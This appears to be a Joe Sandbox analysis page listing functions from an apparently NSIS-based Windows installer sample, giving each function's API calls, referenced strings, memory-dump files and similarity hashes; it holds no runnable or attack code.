Instruction ID: 6ab1becf65089363c82906b09123353a2bcc309babf83807567d4fce196db36a
Opcode Fuzzy Hash: 005642a4020e0a71c09553eb7eb2d495990d68115b85ca719a2b531c3bc6c152
Instruction Fuzzy Hash: CD015E31909220EBC7616B64EE5DBDB3A68AB00704B14457BF905B11F1C6B85C45CFAE

Function 00404ABC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404AD7
GetMessagePos.USER32 ref: 00404ADF
ScreenToClient.USER32(?,?), ref: 00404AF9
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404B0B
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404B31

Strings

f, xrefs: 00404B0D

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
Instruction ID: 0eecd9b69481b59551465bcf9db52b38cf56a1a0cd5b93a9aa54e622b558eefa
Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
Instruction Fuzzy Hash: 4B015E71E00219BADB10DBA4DD85FFEBBBCAB94711F10012BBB10B61D0D7B4A9018BA5

Function 00401D41 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401D44
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
ReleaseDC.USER32(?,00000000), ref: 00401D71
CreateFontIndirectW.GDI32(0040BDA0), ref: 00401DBC

Strings

Times New Roman, xrefs: 00401DA2

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID: Times New Roman
API String ID: 3808545654-927190056
Opcode ID: 328d0a0e3b8fd706af101f3e54d1a8063c16bff27e2a5ea666199fad01018b80
Instruction ID: b353f613be9e85a79a94993a8857fa9d5f5277bee054f22ce4286571968d2ed5
Opcode Fuzzy Hash: 328d0a0e3b8fd706af101f3e54d1a8063c16bff27e2a5ea666199fad01018b80
Instruction Fuzzy Hash: 4A016D31948285EFEB416BB0AE0AFDABF74EB65305F144479F141B62E2C77810058B6E

Function 00402C7F Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9D
wsprintfW.USER32 ref: 00402CD1
SetWindowTextW.USER32(?,?), ref: 00402CE1
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF3

Strings

unpacking data: %d%%, xrefs: 00402CBF, 00402CCF
verifying installer: %d%%, xrefs: 00402CC6

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: fb2a05d00326c25166bc5f9aaa13d1f718a743be953a9e67bdfa073c3cfab417
Instruction ID: 6313022a6a14420ec29aadc91542e870ad3eb66361cb8d6516b6428425dce57e
Opcode Fuzzy Hash: fb2a05d00326c25166bc5f9aaa13d1f718a743be953a9e67bdfa073c3cfab417
Instruction Fuzzy Hash: 36F01270504108ABEF205F50DD4ABAE3768BB00309F00843AFA16B51D1DBB95959DB59

Function 100022D0 Relevance: 9.1, APIs: 6, Instructions: 136memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 10002416

Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C

GlobalAlloc.KERNEL32(?), ref: 10002397
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2

Memory Dump Source

Source File: 00000000.00000002.2298730471.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2298660622.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2298760809.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2299093531.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_09-FD-94.jbxd

Similarity

API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
String ID:
API String ID: 4216380887-0
Opcode ID: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
Instruction ID: a8798eece1b67337def5fc6f06e905ed3cc6fca3e5836deafc22007a072d802d
Opcode Fuzzy Hash: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
Instruction Fuzzy Hash: A14190B1508305EFF320DF24D885AAA77F8FB883D0F50452DF9468619ADB34AA54DB61

Function 100024A9 Relevance: 9.1, APIs: 6, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 1000121B: GlobalAlloc.KERNEL32(?,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225

GlobalFree.KERNEL32(?), ref: 10002572
GlobalFree.KERNEL32(00000000), ref: 100025AD

Memory Dump Source

Source File: 00000000.00000002.2298730471.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2298660622.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2298760809.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2299093531.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_09-FD-94.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
Instruction ID: 76257f5bf6759f365bfcd452de7d39bb0b2322773c3eba187a8a795e141f7608
Opcode Fuzzy Hash: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
Instruction Fuzzy Hash: 6831DE71504A21EFF321CF14CCA8E2B7BF8FB853D2F114529FA40961A8CB319851DB69

Function 004049D6 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 78stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A67
wsprintfW.USER32 ref: 00404A70
SetDlgItemTextW.USER32(?,004226E8), ref: 00404A83

Strings

%u.%u%s%s, xrefs: 00404A51
&B, xrefs: 00404A56

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$&B
API String ID: 3540041739-2907463167
Opcode ID: caf30eb243818e554a1bc62297d78279ecb515a66f5f6d95e05013f04c063739
Instruction ID: b2bc00afb158c588b9a06456614f3f49c694bd1d1c2ad39e9d347cd1a0135542
Opcode Fuzzy Hash: caf30eb243818e554a1bc62297d78279ecb515a66f5f6d95e05013f04c063739
Instruction Fuzzy Hash: 131126737001247BCB10A66D9C45EDF324DDBC5334F144237FA65F60D1D938882186E8

Function 00402331 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nseDB62.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nseDB62.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nseDB62.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC

Strings

C:\Users\user\AppData\Local\Temp\nseDB62.tmp, xrefs: 00402380, 0040238E, 004023A5, 004023B5, 004023C0

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nseDB62.tmp
API String ID: 1356686001-1010241614
Opcode ID: 7abd92b05f405a69157af65e26feabc4c7652e6a2ebb012a6e5cdbbd5c9e1c3c
Instruction ID: 1c964708cf89b7fac74d07524040b6b2ab84de1cfba919da144199f52892a02b
Opcode Fuzzy Hash: 7abd92b05f405a69157af65e26feabc4c7652e6a2ebb012a6e5cdbbd5c9e1c3c
Instruction Fuzzy Hash: A51190B1A00108BEEB11EFA4CD89EAFBB7CEB50358F10443AF505B61D1D7B85E409B29

Function 100018A9 Relevance: 7.7, APIs: 5, Instructions: 189COMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(?), ref: 10001908
GlobalFree.KERNEL32(?), ref: 10001A93
GlobalFree.KERNEL32(?), ref: 10001A98

Memory Dump Source

Source File: 00000000.00000002.2298730471.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2298660622.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2298760809.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2299093531.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_09-FD-94.jbxd

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
Instruction ID: 56de187798276af1e94fdae5c91d23c4da0ac5596926d43ddda2a484f8c4ba85
Opcode Fuzzy Hash: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
Instruction Fuzzy Hash: 82511336E06115ABFB14DFA488908EEBBF5FF863D0F16406AE801B315DD6706F809792

Function 100015FF Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
GlobalAlloc.KERNEL32(?,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
GlobalFree.KERNEL32(00000000), ref: 10001642

Memory Dump Source

Source File: 00000000.00000002.2298730471.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.2298660622.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2298760809.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2299093531.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_09-FD-94.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID:
API String ID: 1148316912-0
Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1

Function 00401CE5 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401CEB
GetClientRect.USER32(00000000,?), ref: 00401CF8
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
DeleteObject.GDI32(00000000), ref: 00401D36

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: cd135f4b73005082297d100c57be3cc5053262b6a7e6c2b6d53efd55afb7b6f5
Instruction ID: 421c968aeac85d0930bc76aa4bc7d64c85250730bd7c855cb2b2db6532b3540a
Opcode Fuzzy Hash: cd135f4b73005082297d100c57be3cc5053262b6a7e6c2b6d53efd55afb7b6f5
Instruction Fuzzy Hash: F9F0E1B2A04104BFDB01DBE4EE88DEEB7BCEB08305B104466F601F5190C674AD018B35

Function 00401BCA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42

Strings

!, xrefs: 00401BFE

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
Instruction ID: bea79b3a0ece1bc6ad67d762bc59202c8df9b0d3ac543b92a9f7cfbf89d94624
Opcode Fuzzy Hash: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
Instruction Fuzzy Hash: 6B217471A44109BEDF019FB0C94AFAD7B75EF44748F20413AF502B61D1D6B8A941DB18

Function 00405993 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403344,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 00405999
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403344,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 004059A3
lstrcatW.KERNEL32(?,00409014), ref: 004059B5

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405993

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3936084776
Opcode ID: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
Instruction ID: a3647a5b8e032715a8ecc0c41ac115d98c53e42c85c632df021e5d83325ae185
Opcode Fuzzy Hash: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
Instruction Fuzzy Hash: 74D0A731101930AAD212BB548C04DDF739CEE45301740407BF605B30A1C77C1D418BFD

Function 00401F08 Relevance: 6.1, APIs: 4, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
GlobalAlloc.KERNEL32(?,00000000,00000000,?,000000EE), ref: 00401F39
GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69

Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
String ID:
API String ID: 1404258612-0
Opcode ID: 3b082d3ae56cd80e188a89b5e125e5232bc00da1bbd486e0c7b94093934bebb9
Instruction ID: 99fd8a33424c76a20816063d32e2a6550cff77f564c1afe2c3b0238effae22d3
Opcode Fuzzy Hash: 3b082d3ae56cd80e188a89b5e125e5232bc00da1bbd486e0c7b94093934bebb9
Instruction Fuzzy Hash: 93113675A00108AECB00DFA5C945DAEBBBAEF44344F20407AF905F62E1D7349E50DB68

Function 00401E51 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004051F2: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
Part of subcall function 004051F2: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
Part of subcall function 004051F2: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nseDB62.tmp\System.dll), ref: 0040525F
Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD

Part of subcall function 004056C3: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256F0,Error launching installer), ref: 004056E8
Part of subcall function 004056C3: CloseHandle.KERNEL32(?), ref: 004056F5

WaitForSingleObject.KERNEL32(00000000,?,00000000,000000EB,00000000), ref: 00401E80
WaitForSingleObject.KERNEL32(?,?,0000000F), ref: 00401E95
GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9

Memory Dump Source

Source File: 00000000.00000002.2288886848.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2288873587.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288940792.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2288954314.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2289109450.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_09-FD-94.jbxd

Similarity

API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
String ID:
API String ID: 3585118688-0
Opcode ID: e25249b87139e6aa3da4cb3d5fac545e17d625a69c27f26b2c2935b711216749
Instruction ID: 663650117de36b32c607de2b5c5339e49b80fcfff4c178b035665d2e4b1c7066
Opcode Fuzzy Hash: e25249b87139e6aa3da4cb3d5fac545e17d625a69c27f26b2c2935b711216749
Instruction Fuzzy Hash: 8811A131E00204EBCF109FA0CD449EF7AB5EB44315F20447BE505B62E0C7798A82DBA9

Function 00405166 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00405195
